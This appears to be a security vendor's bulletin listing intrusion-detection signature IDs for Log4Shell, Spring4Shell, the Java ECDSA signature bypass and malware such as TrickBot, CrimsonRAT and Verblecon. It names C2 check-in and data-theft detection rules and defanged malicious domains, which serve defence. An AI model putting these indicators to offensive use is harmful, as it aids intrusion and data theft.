This is a digital signature bypass vulnerability in Java caused by a flawed implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA). The flaw makes Java accept a blank (all-zero) signature as a valid signature.

Signatures generated by Blockbit

sid:2036377
[ConnectWise CRU] Java ECDSA (Psychic) TLS Signature (CVE-2022-21449)
 
sid:2036392
[ConnectWise CRU] Java ECDSA (Psychic) Signed JWT Bypass (CVE-2022-21449)

April/22

KwampirsRAT

Kwampirs is a remote access trojan capable of gaining access to machines and networks.

Signature generated by Blockbit

Sid 2023595 TROJAN Trojan.Kwampirs Outbound GET request

TrickBot

TrickBot emerged as a banking trojan and has grown into a powerful malware platform capable of stealing data, launching ransomware attacks and destroying files.

Signatures generated by Blockbit

Sid 2023727 TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (TrickBot CnC)

Sid 2033659 TROJAN Win32/TrickBot CnC Initial Checkin M2

Loki Locker

Loki Locker is a ransomware threat that infects systems, encrypts stored files and extorts money from its victims.

Signature generated by Blockbit

Sid 2035510 MALWARE Loki Locker Ransomware User-Agent

DarkHotel

DarkHotel is an espionage campaign that uses forged certificates on hotel Wi-Fi networks to deceive executives staying at luxury hotels.

Signature generated by Blockbit

Sid 2021609 TROJAN Possible DarkHotel Landing M1

CaddyWiper

CaddyWiper is malicious software designed to wipe the data stored on infected devices. Although it is also a wiper, CaddyWiper shares no significant similarities with HermeticWiper or IsaacWiper.

Signature generated by Blockbit

Sid 59268 MALWARE-OTHER Win.Trojan.CaddyWiper download attempt

Mustang Panda

A threat group responsible for APT (Advanced Persistent Threat) campaigns.

Signatures generated by Blockbit

Sid 2035551 TROJAN Suspected Mustang Panda APT Related Activity (GET)

Sid 2035552 TROJAN Suspected Mustang Panda APT Related Activity (GET)

Scarab

Scarab is an espionage threat actor that infiltrates systems to steal data; the signature covers a domain associated with its activity. (The name is also used by an unrelated ransomware family.)

Signature generated by Blockbit

Sid 2035557 TROJAN Scarab APT Related Domain in DNS Lookup

Verblecon

Verblecon is a loader: it drops further malicious payloads onto the devices it infects.

Signatures generated by Blockbit

Sid 2035659 TROJAN Trojan.Verblecon User Agent Observed

Sid 2035660 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (gaymers .ax)

Sid 2035661 TROJAN Observed Trojan.Verblecon Related Domain (gaymers .ax in TLS SNI)

Sid 2035662 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (jonathanhardwick .me)

Sid 2035663 TROJAN Observed Trojan.Verblecon Related Domain (jonathanhardwick .me in TLS SNI)

Sid 2035664 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (.verble .rocks)

Sid 2035665 TROJAN Observed Trojan.Verblecon Related Domain (.verble .rocks in TLS SNI)

Sid 2035666 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (verble .software)

Sid 2035667 TROJAN Observed Trojan.Verblecon Related Domain (verble .software in TLS SNI)

CrimsonRAT

CrimsonRAT is a remote access trojan delivered through spear-phishing emails carrying malicious Microsoft Office documents.

Signatures generated by Blockbit

Sid 2035598 TROJAN Win32/CrimsonRAT Variant Sending Command (inbound)

Sid 2035599 TROJAN Win32/CrimsonRAT Variant Sending Command M2 (inbound)

Sid 2035600 TROJAN Win32/CrimsonRAT Variant Sending System Information (outbound)

Log4Shell

Regarded as the biggest zero-day of the past decade, Log4Shell is a vulnerability in the open source Apache Log4j library.

Signatures generated by Blockbit

DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4shell .huntress .com)

VMWare vSphere log4shell exploit attempt

Sid 2034820

Sid 58811

Sid 58812

Sid 58813

CVE-2021-44228

CVE-2021-44832

CVE-2021-45046

CVE-2021-45105

SpringCore

Regarded as the new Log4j, Spring4Shell is a vulnerability affecting Spring Core, a framework widely used in Java applications.

Signatures generated by Blockbit

Sid 2035670 Possible Spring Cloud Connector RCE Inbound (CVE-2022-22963)

Sid 2035674 Possible SpringCore RCE/Spring4Shell Stage 1 Pattern Set Inbound (Unassigned)

Sid 2035675 Possible SpringCore RCE/Spring4Shell Stage 2 Suffix Set Inbound (Unassigned)

Sid 2035676 Possible SpringCore RCE/Spring4Shell Stage 3 Directory Set Inbound (Unassigned)

Sid 2035677 Possible SpringCore RCE/Spring4Shell Stage 4 Prefix Set Inbound (Unassigned)

Sid 2035678 Possible SpringCore RCE/Spring4Shell Inbound (Unassigned)